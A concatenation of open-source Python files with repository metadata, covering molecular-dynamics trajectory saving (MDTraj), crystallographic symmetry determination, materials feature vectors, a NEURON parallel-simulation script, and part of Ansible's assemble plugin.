box=in_units_of(self.unitcell_vectors, Trajectory._distance_unit, f.distance_unit)) def save_dcd(self, filename, force_overwrite=True): """Save trajectory to CHARMM/NAMD DCD format Parameters ---------- filename : str filesystem path in which to save the trajectory force_overwrite : bool, default=True Overwrite anything that exists at filenames, if its already there """ self._check_valid_unitcell() with DCDTrajectoryFile(filename, 'w', force_overwrite=force_overwrite) as f: f.write(xyz=in_units_of(self.xyz, Trajectory._distance_unit, f.distance_unit), cell_lengths=in_units_of(self.unitcell_lengths, Trajectory._distance_unit, f.distance_unit), cell_angles=self.unitcell_angles) def save_dtr(self, filename, force_overwrite=True): """Save trajectory to DESMOND DTR format Parameters ---------- filename : str filesystem path in which to save the trajectory force_overwrite : bool, default=True Overwrite anything that exists at filenames, if its already there """ self._check_valid_unitcell() with DTRTrajectoryFile(filename, 'w', force_overwrite=force_overwrite) as f: f.write(xyz=in_units_of(self.xyz, Trajectory._distance_unit, f.distance_unit), cell_lengths=in_units_of(self.unitcell_lengths, Trajectory._distance_unit, f.distance_unit), cell_angles=self.unitcell_angles, times=self.time) def save_binpos(self, filename, force_overwrite=True): """Save trajectory to AMBER BINPOS format Parameters ---------- filename : str filesystem path in which to save the trajectory force_overwrite : bool, default=True Overwrite anything that exists at filename, if its already there """ with BINPOSTrajectoryFile(filename, 'w', force_overwrite=force_overwrite) as f: f.write(in_units_of(self.xyz, Trajectory._distance_unit, f.distance_unit)) def save_mdcrd(self, filename, force_overwrite=True): """Save trajectory to AMBER mdcrd format Parameters ---------- filename : str filesystem path in which to save the trajectory force_overwrite : bool, default=True Overwrite anything that exists at filename, if its already there """ self._check_valid_unitcell() if self._have_unitcell: if not np.all(self.unitcell_angles == 90): raise ValueError('Only rectilinear boxes can be saved to mdcrd files. ' 'Your angles are {}'.format(self.unitcell_angles)) with MDCRDTrajectoryFile(filename, mode='w', force_overwrite=force_overwrite) as f: f.write(xyz=in_units_of(self.xyz, Trajectory._distance_unit, f.distance_unit), cell_lengths=in_units_of(self.unitcell_lengths, Trajectory._distance_unit, f.distance_unit)) def save_netcdf(self, filename, force_overwrite=True): """Save trajectory in AMBER NetCDF format Parameters ---------- filename : str filesystem path in which to save the trajectory force_overwrite : bool, default=True Overwrite anything that exists at filename, if it's already there """ self._check_valid_unitcell() with NetCDFTrajectoryFile(filename, 'w', force_overwrite=force_overwrite) as f: f.write(coordinates=in_units_of(self._xyz, Trajectory._distance_unit, NetCDFTrajectoryFile.distance_unit), time=self.time, cell_lengths=in_units_of(self.unitcell_lengths, Trajectory._distance_unit, f.distance_unit), cell_angles=self.unitcell_angles) def save_netcdfrst(self, filename, force_overwrite=True): """Save trajectory in AMBER NetCDF restart format Parameters ---------- filename : str filesystem path in which to save the restart force_overwrite : bool, default=True Overwrite anything that exists at filename, if it's already there Notes ----- NetCDF restart files can only store a single frame. If only one frame exists, "filename" will be written. Otherwise, "filename.#" will be written, where # is a zero-padded number from 1 to the total number of frames in the trajectory """ self._check_valid_unitcell() if self.n_frames == 1: with AmberNetCDFRestartFile(filename, 'w', force_overwrite=force_overwrite) as f: coordinates = in_units_of(self._xyz, Trajectory._distance_unit, AmberNetCDFRestartFile.distance_unit) lengths = in_units_of(self.unitcell_lengths, Trajectory._distance_unit, AmberNetCDFRestartFile.distance_unit) f.write(coordinates=coordinates, time=self.time[0], cell_lengths=lengths, cell_angles=self.unitcell_angles) else: fmt = '%s.%%0%dd' % (filename, len(str(self.n_frames))) for i in xrange(self.n_frames): with AmberNetCDFRestartFile(fmt % (i+1), 'w', force_overwrite=force_overwrite) as f: coordinates = in_units_of(self._xyz, Trajectory._distance_unit, AmberNetCDFRestartFile.distance_unit) lengths = in_units_of(self.unitcell_lengths, Trajectory._distance_unit, AmberNetCDFRestartFile.distance_unit) f.write(coordinates=coordinates[i], time=self.time[i], cell_lengths=lengths[i], cell_angles=self.unitcell_angles[i]) def save_amberrst7(self, filename, force_overwrite=True): """Save trajectory in AMBER ASCII restart format Parameters ---------- filename : str filesystem path in which to save the restart force_overwrite : bool, default=True Overwrite anything that exists at filename, if it's already there Notes ----- Amber restart files can only store a single frame. If only one frame exists, "filename" will be written. Otherwise, "filename.#" will be written, where # is a zero-padded number from 1 to the total number of frames in the trajectory """ self._check_valid_unitcell() if self.n_frames == 1: with AmberRestartFile(filename, 'w', force_overwrite=force_overwrite) as f: coordinates = in_units_of(self._xyz, Trajectory._distance_unit, AmberRestartFile.distance_unit) lengths = in_units_of(self.unitcell_lengths, Trajectory._distance_unit, AmberRestartFile.distance_unit) f.write(coordinates=coordinates, time=self.time[0], cell_lengths=lengths, cell_angles=self.unitcell_angles) else: fmt = '%s.%%0%dd' % (filename, len(str(self.n_frames))) for i in xrange(self.n_frames): with AmberRestartFile(fmt % (i+1), 'w', force_overwrite=force_overwrite) as f: coordinates = in_units_of(self._xyz, Trajectory._distance_unit, AmberRestartFile.distance_unit) lengths = in_units_of(self.unitcell_lengths, Trajectory._distance_unit, AmberRestartFile.distance_unit) f.write(coordinates=coordinates[i], time=self.time[0], cell_lengths=lengths[i], cell_angles=self.unitcell_angles[i]) def save_lh5(self, filename, force_overwrite=True): """Save trajectory in deprecated MSMBuilder2 LH5 (lossy HDF5) format. Parameters ---------- filename : str filesystem path in which to save the trajectory force_overwrite : bool, default=True Overwrite anything that exists at filename, if it's already there """ with LH5TrajectoryFile(filename, 'w', force_overwrite=force_overwrite) as f: f.write(coordinates=self.xyz) f.topology = self.topology def save_gro(self, filename, force_overwrite=True, precision=3): """Save trajectory in Gromacs .gro format Parameters ---------- filename : str Path to save the trajectory force_overwrite : bool, default=True Overwrite anything that exists at that filename if it exists precision : int, default=3 The number of decimal places to use for coordinates in GRO file """ self._check_valid_unitcell() with GroTrajectoryFile(filename, 'w', force_overwrite=force_overwrite) as f: f.write(self.xyz, self.topology, self.time, self.unitcell_vectors, precision=precision) def center_coordinates(self, mass_weighted=False): """Center each trajectory frame at the origin (0,0,0). This method acts inplace on the trajectory. The centering can be either uniformly weighted (mass_weighted=False) or weighted by the mass of each atom (mass_weighted=True). Parameters ---------- mass_weighted : bool, optional (default = False) If True, weight atoms by mass when removing COM. Returns ------- self """ if mass_weighted and self.top is not None: self.xyz -= distance.compute_center_of_mass(self)[:, np.newaxis, :] else: self._rmsd_traces = _rmsd._center_inplace_atom_major(self._xyz) return self @deprecated('restrict_atoms was replaced by atom_slice and will be removed in 2.0') def restrict_atoms(self, atom_indices, inplace=True): """Retain only a subset of the atoms in a trajectory Deletes atoms not in `atom_indices`, and re-indexes those that remain Parameters ---------- atom_indices : array-like, dtype=int, shape=(n_atoms) List of atom indices to keep. inplace : bool, default=True If ``True``, the operation is done inplace, modifying ``self``. Otherwise, a copy is returned with the restricted atoms, and ``self`` is not modified. Returns ------- traj : md.Trajectory The return value is either ``self``, or the new trajectory, depending on the value of ``inplace``. """ return self.atom_slice(atom_indices, inplace=inplace) def atom_slice(self, atom_indices, inplace=False): """Create a new trajectory from a subset of atoms Parameters ---------- atom_indices : array-like, dtype=int, shape=(n_atoms) List of indices of atoms to retain in the new trajectory. inplace : bool, default=False If ``True``, the operation is done inplace, modifying ``self``. Otherwise, a copy is returned with the sliced atoms, and ``self`` is not modified. Returns ------- traj : md.Trajectory The return value is either ``self``, or the new trajectory, depending on the value of ``inplace``. See Also -------- stack : stack multiple trajectories along the atom axis """ xyz = np.array(self.xyz[:, atom_indices], order='C') topology = None if self._topology is not None: topology = self._topology.subset(atom_indices) if inplace: if self._topology is not None: self._topology = topology self._xyz = xyz return self unitcell_lengths = unitcell_angles = None if self._have_unitcell: unitcell_lengths = self._unitcell_lengths.copy() unitcell_angles = self._unitcell_angles.copy() time = self._time.copy() return Trajectory(xyz=xyz, topology=topology, time=time, unitcell_lengths=unitcell_lengths, unitcell_angles=unitcell_angles) def remove_solvent(self, exclude=None, inplace=False): """ Create a new trajectory without solvent atoms Parameters ---------- exclude : array-like, dtype=str, shape=(n_solvent_types) List of solvent residue names to retain in the new trajectory. inplace : bool, default=False The return value is either ``self``, or the new trajectory, depending on the value of ``inplace``. Returns ------- traj : md.Trajectory The return value is either ``self``, or the new trajectory, depending on the value of ``inplace``. """ solvent_types = list(_SOLVENT_TYPES) if exclude is not None: if isinstance(exclude, str): raise TypeError('exclude must be array-like') if not isinstance(exclude, Iterable): raise TypeError('exclude is not iterable') for type in exclude: if type not in solvent_types: raise ValueError(type + 'is not a valid solvent type') solvent_types.remove(type) atom_indices = [atom.index for atom in self.topology.atoms if atom.residue.name not in solvent_types] return self.atom_slice(atom_indices, inplace = inplace) def smooth(self, width, order=3, atom_indices=None, inplace=False): """Smoothen a trajectory using a zero-delay Buttersworth filter. Please note that for optimal results the trajectory should be properly aligned prior to smoothing (see `md.Trajectory.superpose`). Parameters ---------- width : int This acts very similar to the window size in a moving average smoother. In this implementation, the frequency of the low-pass filter is taken to be two over this width, so it's like "half the period" of the sinusiod where the filter starts to kick in. Must be an integer greater than one. order : int, optional, default=3 The order of the filter. A small odd number is recommended. Higher order filters cutoff more quickly, but have worse numerical properties. atom_indices : array-like, dtype=int, shape=(n_atoms), default=None List of indices of atoms to retain in the new trajectory. Default is set to `None`, which applies smoothing to all atoms. inplace : bool, default=False The return value is either ``self``, or the new trajectory, depending on the value of ``inplace``. Returns ------- traj : md.Trajectory The return value is either ``self``, or the new smoothed trajectory, depending on the value of ``inplace``. References ---------- .. [1] "FiltFilt". Scipy Cookbook. SciPy. <http://www.scipy.org/Cookbook/FiltFilt>. """ from scipy.signal import lfilter, lfilter_zi, filtfilt, butter if width < 2.0 or not isinstance(width, int): raise ValueError('width must be an integer greater than 1.') if not atom_indices: atom_indices = range(self.n_atoms) # find nearest odd integer pad = int(np.ceil((width + 1)/2)*2 - 1) # Use lfilter_zi to choose the initial condition of the filter. b, a = butter(order, 2.0 / width) zi = lfilter_zi(b, a) xyz = self.xyz.copy() for i in atom_indices: for j in range(3): signal = xyz[:, i, j] padded = np.r_[signal[pad - 1: 0: -1], signal, signal[-1: -pad: -1]] # Apply the filter to the width. z, _ = lfilter(b, a, padded, zi=zi*padded[0]) # Apply the filter again, to have a result filtered at an order # the same as filtfilt. z2, _ = lfilter(b, a, z, zi=zi*z[0]) # Use filtfilt to apply the filter. output = filtfilt(b, a, padded) xyz[:, i, j] = output[(pad-1): -(pad-1)] if not inplace: return Trajectory(xyz=xyz, topology=self.topology, time=self.time, unitcell_lengths=self.unitcell_lengths, unitcell_angles=self.unitcell_angles) self.xyz = xyz def _check_valid_unitcell(self): """Do some sanity checking on self.unitcell_lengths and self.unitcell_angles """ if self.unitcell_lengths is not None and self.unitcell_angles is None: raise AttributeError('unitcell length data exists, but no angles') if self.unitcell_lengths is None and self.unitcell_angles is not None: raise AttributeError('unitcell angles data exists, but no lengths') if self.unitcell_lengths is not None and np.any(self.unitcell_lengths < 0): raise ValueError('unitcell length < 0') if self.unitcell_angles is not None and np.any(self.unitcell_angles < 0): raise ValueError('unitcell angle < 0') @property def _have_unitcell(self): return self._unitcell_lengths is not None and self._unitcell_angles is not None def image_molecules(self, inplace=False): """Recenter and apply periodic boundary conditions to the molecules in each frame of the trajectory. This method is useful for visualizing a trajectory in which molecules were not wrapped to the periodic unit cell, or in which the macromolecules are not centered with respect to the solvent. It tries to be intelligent in deciding what molecules to center, so you can simply call it and trust that it will "do the right thing". Parameters ---------- inplace : bool, default=False If False, a new Trajectory is created and returned. If True, this Trajectory is modified directly. Returns ------- traj : md.Trajectory The return value is either ``self`` or the new trajectory, depending on the value of ``inplace``. """ if self._topology is None: raise ValueError('Trajectory must have a Topology that defines molecules') unitcell_vectors = self.unitcell_vectors if unitcell_vectors is None: raise ValueError('This Trajectory does not define a periodic unit cell') molecules = self._topology.find_molecules() all_atoms = list(self._topology.atoms) if inplace: result = self else: result = Trajectory(xyz=self.xyz, topology=self.topology, time=self.time, unitcell_lengths=self.unitcell_lengths, unitcell_angles=self.unitcell_angles) sorted_bonds = sorted(self._topology.bonds, key=lambda bond: bond[0].index) # Select the anchor molecules. molecules.sort(key=lambda x: -len(x)) atoms_cutoff = max(len(molecules[int(0.1*len(molecules))]), int(0.1*len(molecules[0]))) anchor_molecules = [m for m in molecules if len(m) > atoms_cutoff] other_molecules = [m for m in molecules if len(m) <= atoms_cutoff] num_anchors = len(anchor_molecules) anchor_atom_indices = [] for mol in anchor_molecules: anchor_atom_indices += [atom.index for atom in mol] # Loop over frames and process each one. for frame in range(self.n_frames): # Fix each molecule to ensure the periodic boundary conditions are not splitting it into pieces. frame_positions = result.xyz[frame] for atom1, atom2 in sorted_bonds: pos1 = frame_positions[atom1.index, :] pos2 = frame_positions[atom2.index, :] delta = pos2-pos1 offset = np.zeros((3)) offset += unitcell_vectors[frame,2]*np.round(delta[2]/unitcell_vectors[frame,2,2]) offset += unitcell_vectors[frame,1]*np.round((delta[1]-offset[1])/unitcell_vectors[frame,1,1]) offset += unitcell_vectors[frame,0]*np.round((delta[0]-offset[0])/unitcell_vectors[frame,0,0]) frame_positions[atom2.index, :] -= offset # Compute the distance between each pair of anchor molecules in this frame. anchor_dist = np.zeros((num_anchors, num_anchors)) anchor_nearest_atoms = np.zeros((num_anchors, num_anchors, 2), dtype=int) for mol1 in range(num_anchors): atoms1 = np.array([atom.index for atom in anchor_molecules[mol1]], dtype=int) for mol2 in range(mol1): atoms2 = np.array([atom.index for atom in anchor_molecules[mol2]], dtype=int) contact = find_closest_contact(self, atoms1, atoms2, frame) anchor_dist[mol1, mol2] = contact[2] anchor_dist[mol2, mol1] = contact[2] atoms = np.array(contact[:2]) anchor_nearest_atoms[mol1, mol2] = atoms anchor_nearest_atoms[mol2, mol1] = atoms # Start by taking the largest molecule as our first anchor. used_anchors = [0] available_anchors = list(range(1, num_anchors)) min_anchor_dist = anchor_dist[0, :] # Add in anchors one at a time, always taking the one that is nearest an existing anchor. while len(available_anchors) > 0: next_index = np.argmin(min_anchor_dist[available_anchors]) next_anchor = available_anchors[next_index] # Find which existing anchor it's closest to, and choose the periodic copy that minimizes # the distance to that anchor. nearest_to = used_anchors[np.argmin(anchor_dist[next_anchor, used_anchors])] atoms = anchor_nearest_atoms[next_anchor, nearest_to] if all_atoms[atoms[0]] in molecules[next_anchor]: atoms = atoms[::-1] delta = frame_positions[atoms[1]]-frame_positions[atoms[0]] offset = np.zeros((3)) offset += unitcell_vectors[frame,2]*np.round(delta[2]/unitcell_vectors[frame,2,2]) offset += unitcell_vectors[frame,1]*np.round((delta[1]-offset[1])/unitcell_vectors[frame,1,1]) offset += unitcell_vectors[frame,0]*np.round((delta[0]-offset[0])/unitcell_vectors[frame,0,0]) for atom in molecules[next_anchor]: frame_positions[atom.index] -= offset # Transfer it from the available list to the used list. used_anchors.append(next_anchor) del available_anchors[next_index] # Find the center of all anchor molecules. if num_anchors == 0: center = np.zeros((3)) else: center = np.mean(frame_positions[anchor_atom_indices], axis=0) # Loop over all molecules, apply the correct offset (so that anchor molecules will end up centered # in the periodic box), and then wrap the molecule into the box. offset = 0.5*np.array((unitcell_vectors[frame,0,0], unitcell_vectors[frame,1,1], unitcell_vectors[frame,2,2])) - center result.xyz[frame, :] += offset for mol in other_molecules: mol_atom_indices = [atom.index for atom in mol] mol_center = np.mean(result.xyz[frame, mol_atom_indices], axis=0) mol_offset = mol_center.copy() mol_offset -= unitcell_vectors[frame,2]*np.floor(mol_offset[2]/unitcell_vectors[frame,2,2]) mol_offset -= unitcell_vectors[frame,1]*np.floor(mol_offset[1]/unitcell_vectors[frame,1,1]) mol_offset -= unitcell_vectors[frame,0]*np.floor(mol_offset[0]/unitcell_vectors[frame,0,0]) result.xyz[frame, mol_atom_indices] += mol_offset-mol_center if not inplace: return result return self
swails/mdtraj
mdtraj/core/trajectory.py
Python
lgpl-2.1
78,389
[ "Amber", "CHARMM", "Desmond", "Gromacs", "LAMMPS", "MDTraj", "NAMD", "NetCDF", "OpenMM" ]
6db7d284468f5255fbf6ef8843e34d9d1a83c8d8900263553abe1f4c3c158c82
""" (c) RIKEN 2017. All rights reserved. Author: Keitaro Yamashita This software is released under the new BSD License; see LICENSE. """ from yamtbx.dataproc.auto.multi_merging.resolve_reindex import KabschSelectiveBreeding from yamtbx.util import read_path_list from libtbx.utils import multi_out import iotbx.phil import libtbx.phil from cctbx import sgtbx from cctbx import crystal import os import sys import copy import numpy master_params_str = """\ lstin = None .type = path .help = list of XDS_ASCII.HKL method = pointless *selective_breeding .type = choice(multi=False) .help = method from_p1 = False .type = bool .help = Start from P1 whatever the symmetry of input files. logfile = "multi_determine_symmetry.log" .type = path .help = logfile name nproc = 1 .type = int .help = number of processors d_min = 3 .type = float .help = high resolution cutoff used in the method min_ios = None .type = float .help = minimum I/sigma(I) cutoff used in the method max_delta = 5 .type = float .help = maximum obliquity used in determining the lattice symmetry, using a modified Le-Page algorithm. max_cycles = 100 .type = int(value_min=1) .help = Maximum number of cycles for selective_breeding algorithm. """ def run(params): log_out = multi_out() log_out.register("log", open(params.logfile, "w"), atexit_send_to=None) log_out.register("stdout", sys.stdout) libtbx.phil.parse(master_params_str).format(params).show(out=log_out, prefix=" ") xac_files = read_path_list(params.lstin, only_exists=True, err_out=log_out) if len(xac_files) == 0: print >>log_out, "No (existing) files in the list: %s" % params.lstin return if params.method == "selective_breeding": rb = KabschSelectiveBreeding(xac_files, max_delta=params.max_delta, d_min=params.d_min, min_ios=params.min_ios, nproc=params.nproc, log_out=log_out, from_p1=params.from_p1) xs = rb.representative_crystal_symmetry() log_out.write("Starting from:\n") xs.show_summary(log_out, " ") log_out.write("\n") rb.assign_operators(max_cycle=params.max_cycles) rb.show_assign_summary() final_cc_means = rb.final_cc_means() assert len(final_cc_means) == len(xac_files) reidx_ops = rb.reindex_operators() sg = copy.copy(xs.space_group()) unit_cell = xs.unit_cell() cc0 = map(lambda x: x[0][1], final_cc_means) log_out.write("Analyzing KabschSelectiveBreeding result..\n") accepted_ops = [] for iop in range(1, len(reidx_ops)): cci = map(lambda x: x[iop][1], final_cc_means) corr = numpy.corrcoef(cc0, cci)[0,1] log_out.write(" h,k,l vs %s: corr= %.4f\n" % (reidx_ops[iop].as_hkl(), corr)) if corr > 0.5: accepted_ops.append(reidx_ops[iop]) sg.expand_smx(reidx_ops[iop].as_hkl()) unit_cell = unit_cell.change_basis(reidx_ops[iop]) log_out.write(" this operator accepted. sg= %s\n" % sg.info()) log_out.write("Solution:\n") new_xs = crystal.symmetry(unit_cell, space_group=sg) new_xs.show_summary(log_out, " ") log_out.write("As reference setting:\n") new_xs.as_reference_setting().show_summary(log_out, " ") log_out.write("Initial:\n") xs.show_summary(log_out, " ") log_out.write(""" * Notice * Here the space group is deduced from the similarity of reflection intensities under the constraint of lattice symmetry. This could be wrong especially when the crystal is twineed. Please note that space group is only determined when the structure is solved. """) else: raise "invalid method choice (method=%s)" % params.method # run() def show_help(): print """ """ iotbx.phil.parse(master_params_str).show(prefix=" ", attributes_level=1) print # show_help() def run_from_args(argv): if "-h" in argv or "--help" in argv: show_help() return cmdline = iotbx.phil.process_command_line(args=argv, master_string=master_params_str) params = cmdline.work.extract() args = cmdline.remaining_args for arg in args: if os.path.isfile(arg) and params.lstin is None: params.lstin = arg if params.lstin is None: show_help() print "Error: Give .lst of XDS_ASCII files" quit() run(params) # run_from_args() if __name__ == "__main__": import sys run_from_args(sys.argv[1:])
keitaroyam/yamtbx
yamtbx/dataproc/auto/command_line/multi_determine_symmetry.py
Python
bsd-3-clause
4,678
[ "CRYSTAL" ]
8fd004b42a9f1a1f6a1326803491993b032001f3672ca78d197d81a418a2f294
### FEATURE VECTORS ### """ From Wei's paper, we know natural log of volume (lnV), energy per atom (Ec), elemental weighted average of atomic number (AlnZ), and elemental weighted std deviation of electronegativity (SX) correlate relatively strongly to bulk modulus (K). Feature vectors that utilize these correlations will aid in predicting bulk moduli of materials. We eventually want to reduce these vectors to 2D. We will try every combination of features in vectors from 1-4 dimensions. Hypothesis: 4D vector with all correlations will perform the best """ import os import numpy as np from pymatgen.core.periodic_table import Element from pymatgen import MPRester from math import log def element_lister(material): element_list = [] for element in material['reduced_cell_formula']: for i in range(int(material['reduced_cell_formula'][element])): element_list += [element] return element_list def get_ln_volume(material, elem_list): return log(material['volume']/material['nsites']) def get_c_energy_per_atom(material, elem_list): energy_per_atom = material['formation_energy_per_atom'] total_energy = energy_per_atom*len(elem_list) return total_energy def get_avg_Z_num(material, elem_list): Z_list = [] for element in elem_list: Z_list += [log(Element(element).Z)] return np.average(Z_list) def get_sd_X(material, elem_list): X_list = [] for element in elem_list: X_list += [log(Element(element).X)] return np.std(X_list) key = os.environ['MAPI_KEY'] m = MPRester(key) materials_list = m.query(criteria={"elasticity": {"$exists": True}}, properties=['pretty_formula', 'reduced_cell_formula', "elasticity.K_VRH", 'volume', 'density', 'formation_energy_per_atom', 'formation_energy_per_atom', 'nsites']) def vectorize_and_catalog(materials): vector_list = [] catalog = {} for material in materials: element_list = element_lister(material) vector = [get_ln_volume(material, element_list), get_c_energy_per_atom(material, element_list), get_avg_Z_num(material, element_list), get_sd_X(material, element_list)] vector_list += [vector] catalog[tuple(vector)] = material return vector_list, catalog def vector_to_material(vector): return catalog[tuple(vector)] def normalize_vectors(vector_list): vector_array = np.array(vector_list) mean_each_column = np.mean(vector_array, axis=0) std_each_column = np.std(vector_array, axis=0) for i in range(len(vector_array)): difference_from_mean = np.subtract(vector_array[i], mean_each_column) vector_array[i] = np.divide(difference_from_mean, std_each_column) return vector_array
mp-interns/eratosthenes
neigh/featurevectors.py
Python
bsd-2-clause
2,684
[ "pymatgen" ]
68ad110b47c55c9d7e1bd6255e25d347ce42c266a2895c8015e9c263a18ebb29
# # # File to generate network for execution on parallel NEURON # Note this script has only been tested with UCL's cluster! # # Author: Padraig Gleeson # # This file has been developed as part of the neuroConstruct project # This work has been funded by the Medical Research Council and the # Wellcome Trust # # import sys import os import time try: from java.io import File except ImportError: print "Note: this file should be run using ..\\..\\..\\nC.bat -python XXX.py' or '../../../nC.sh -python XXX.py'" print "See http://www.neuroconstruct.org/docs/python.html for more details" quit() sys.path.append(os.environ["NC_HOME"]+"/pythonNeuroML/nCUtils") from ucl.physiol.neuroconstruct.hpc.mpi import MpiSettings from ucl.physiol.neuroconstruct.simulation import SimulationData import ncutils as nc # Many useful functions such as SimManager.runMultipleSims found here projFile = File("../Parallel.ncx") ########### Main settings ########### simDuration = 100 # ms simDt = 0.025 # ms neuroConstructSeed = 1234 simulatorSeed = 1111 simulators = ["NEURON"] simConfigs = [] simConfigs.append("LargeNetwork") mpiConfigs = [MpiSettings.MATLEM_1PROC, MpiSettings.MATLEM_2PROC, MpiSettings.MATLEM_4PROC, \ MpiSettings.MATLEM_8PROC, MpiSettings.MATLEM_16PROC,MpiSettings.MATLEM_32PROC,MpiSettings.MATLEM_64PROC, MpiSettings.MATLEM_128PROC, MpiSettings.MATLEM_216PROC] #mpiConfigs = [MpiSettings.LOCAL_SERIAL] mpiConfigs = [MpiSettings.MATLEM_1PROC, MpiSettings.MATLEM_2PROC, MpiSettings.MATLEM_4PROC,MpiSettings.MATLEM_16PROC,MpiSettings.MATLEM_32PROC, MpiSettings.MATLEM_64PROC, MpiSettings.MATLEM_128PROC, MpiSettings.MATLEM_216PROC] #mpiConfigs = [MpiSettings.LOCAL_4PROC] mpiConfigs = ["LEMMON_8","LEMMON_16", "LEMMON_24", "LEMMON_32", "LEMMON_40"] multipleRuns = [-1, -2, -3, -4] multipleRuns = [-1] suggestedRemoteRunTime = 120 # mins varTimestepNeuron = False analyseSims = True plotSims = True plotVoltageOnly = True simAllPrefix = "B_" # Adds a prefix to simulation reference numCells1 = 6000 numCells2 = 6000 runInBackground = True verbose = True runSims = True #runSims = False saveAsHdf5 = True #saveAsHdf5 = False saveOnlySpikes = True from ucl.physiol.neuroconstruct.neuron import NeuronFileManager runMode = NeuronFileManager.RUN_HOC #runMode = NeuronFileManager.RUN_PYTHON_XML numConcurrentSims = 4 if mpiConfigs != [MpiSettings.LOCAL_SERIAL]: numConcurrentSims = 30 ####################################### def testAll(argv=None): if argv is None: argv = sys.argv print "Loading project from "+ projFile.getCanonicalPath() simManager = nc.SimulationManager(projFile, numConcurrentSims = numConcurrentSims, verbose = verbose) ### Change num in each cell group simManager.project.cellGroupsInfo.getCellPackingAdapter("lg1").setMaxNumberCells(numCells1) simManager.project.cellGroupsInfo.getCellPackingAdapter("lg2").setMaxNumberCells(numCells2) allSims = simManager.runMultipleSims(simConfigs = simConfigs, simDt = simDt, simDuration = simDuration, simulators = simulators, runInBackground = runInBackground, varTimestepNeuron = varTimestepNeuron, mpiConfigs = mpiConfigs, suggestedRemoteRunTime = suggestedRemoteRunTime, simRefGlobalPrefix = simAllPrefix, runSims = runSims, maxElecLens = multipleRuns, saveAsHdf5 = saveAsHdf5, saveOnlySpikes = saveOnlySpikes, runMode = runMode) while (len(simManager.allRunningSims)>0): print "Waiting for the following sims to finish: "+str(simManager.allRunningSims) time.sleep(5) # wait a while... simManager.updateSimsRunning() times = [] procNums = [] for sim in allSims: simDir = File(projFile.getParentFile(), "/simulations/"+sim) try: simData = SimulationData(simDir) simData.initialise() simTime = simData.getSimulationProperties().getProperty("RealSimulationTime") print "Simulation: %s took %s seconds"%(sim, simTime) times.append(float(simTime)) paraConfig = simData.getSimulationProperties().getProperty("Parallel configuration") print paraConfig numProc = int(paraConfig[max(paraConfig.find(" host, ")+7, paraConfig.find(" hosts, ")+8):paraConfig.find(" processor")]) procNums.append(numProc) except: print "Error analysing simulation data from: %s"%simDir.getCanonicalPath() print sys.exc_info() print times print procNums ''' import matplotlib.pyplot as plt lines = plt.loglog(times, procNums, 'r:') plt.ylabel('Simulation time') plt.xlabel('Number of processors') plt.show()''' from ucl.physiol.neuroconstruct.gui.plotter import PlotManager from ucl.physiol.neuroconstruct.gui.plotter import PlotCanvas from ucl.physiol.neuroconstruct.dataset import DataSet plotFrame = PlotManager.getPlotterFrame("Time for simulation run on different numbers of processors", 0, 1) plotFrame.setViewMode(PlotCanvas.INCLUDE_ORIGIN_VIEW) info = "Simulation times for: "+str(procNums) dataSet = DataSet(info, info, "#", "s", "Number of processors", "Simulation time") dataSet.setGraphFormat(PlotCanvas.USE_CIRCLES_FOR_PLOT) for i in range(len(times)): #dataSet.addPoint(procNums[i],times[i]*procNums[i]) dataSet.addPoint(procNums[i],times[i]) plotFrame.addDataSet(dataSet) if __name__ == "__main__": testAll()
pgleeson/TestArea
models/Parallel/pythonScripts/Big_Data.py
Python
gpl-2.0
6,552
[ "NEURON" ]
e6a660044e70823e468ebdcfaa180d0cc3fb708a1222e98d48304400b5d00095
# (c) 2013-2014, Michael DeHaan <michael.dehaan@gmail.com> # Stephen Fromm <sfromm@gmail.com> # Brian Coca <briancoca+dev@gmail.com> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License from __future__ import (absolute_import, division, print_function) __metaclass__ = type import os import os.path import tempfile import re from ansible.errors import AnsibleError from ansible.plugins.action import ActionBase from ansible.utils.boolean import boolean from ansible.utils.hashing import checksum_s from ansible.utils.unicode import to_str class ActionModule(ActionBase): TRANSFERS_FILES = True def _assemble_from_fragments(self, src_path, delimiter=None, compiled_regexp=None, ignore_hidden=False): ''' assemble a file from a directory of fragments ''' tmpfd, temp_path = tempfile.mkstemp() tmp = os.fdopen(tmpfd,'w') delimit_me = False add_newline = False for f in sorted(os.listdir(src_path)): if compiled_regexp and not compiled_regexp.search(f): continue fragment = "%s/%s" % (src_path, f) if not os.path.isfile(fragment) or (ignore_hidden and os.path.basename(fragment).startswith('.')): continue fragment_content = file(self._loader.get_real_file(fragment)).read() # always put a newline between fragments if the previous fragment didn't end with a newline. if add_newline: tmp.write('\n') # delimiters should only appear between fragments if delimit_me: if delimiter: # un-escape anything like newlines delimiter = delimiter.decode('unicode-escape') tmp.write(delimiter) # always make sure there's a newline after the # delimiter, so lines don't run together if delimiter[-1] != '\n': tmp.write('\n') tmp.write(fragment_content) delimit_me = True if fragment_content.endswith('\n'): add_newline = False else: add_newline = True tmp.close() return temp_path def run(self, tmp=None, task_vars=None): if task_vars is None: task_vars = dict() result = super(ActionModule, self).run(tmp, task_vars) if self._play_context.check_mode: result['skipped'] = True result['msg'] = "skipped, this module does not support check_mode." return result src = self._task.args.get('src', None) dest = self._task.args.get('dest', None) delimiter = self._task.args.get('delimiter', None) remote_src = self._task.args.get('remote_src', 'yes') regexp = self._task.args.get('regexp', None) follow = self._task.args.get('follow', False) ignore_hidden = self._task.args.get('ignore_hidden', False) if src is None or dest is None: result['failed'] = True result['msg'] = "src and dest are required" return result remote_user = task_vars.get('ansible_ssh_user') or self._play_context.remote_user if not tmp: tmp = self._make_tmp_path(remote_user) self._cleanup_remote_tmp = True if boolean(remote_src): result.update(self._execute_module(tmp=tmp, task_vars=task_vars, delete_remote_tmp=False)) self._remove_tmp_path(tmp) return result else: try: src = self._find_needle('files', src) except AnsibleError as e: result['failed'] = True result['msg'] = to_str(e) return result if not os.path.isdir(src): result['failed'] = True result['msg'] = "Source (%s) is not a directory" % src return result _re = None if regexp is not None: _re = re.compile(regexp) # Does all work assembling the file path = self._assemble_from_fragments(src, delimiter, _re, ignore_hidden) path_checksum = checksum_s(path) dest = self._remote_expand_user(dest) dest_stat = self._execute_remote_stat(dest, all_vars=task_vars, follow=follow, tmp=tmp) diff = {} # setup args for running modules new_module_args = self._task.args.copy() # clean assemble specific options for opt in ['remote_src', 